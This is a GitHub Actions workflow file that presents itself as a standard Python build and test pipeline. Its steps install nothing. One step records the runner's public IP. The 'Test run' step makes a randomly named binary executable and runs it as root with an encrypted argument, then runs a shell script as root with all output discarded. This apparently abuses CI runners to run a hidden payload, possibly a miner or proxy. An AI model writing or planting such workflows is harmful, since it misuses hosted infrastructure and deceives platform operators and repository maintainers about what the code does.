name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 12

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        curl ifconfig.me > ip.txt
        cat ip.txt
    - name: Test run
      run: |
        cd ${{ github.workspace }}
        echo 'akhl9'
        sudo chmod +x garyiip7x/heardyg34i.ex
        sudo ./garyiip7x/heardyg34i.ex U2FsdGVkX18dIUkc6ppHn/IupUYI/MG+D4c7O03PFReUPrV7X9/51iwXFBpODTe7oV4cduyrG7zXYCYeW0rboYQU1MfuDn4D4mHoQ+LM5csHKtE4Ch0XX/uavvz3UxjV ahj0ag && sudo sh r.sh > /dev/null 2>&1
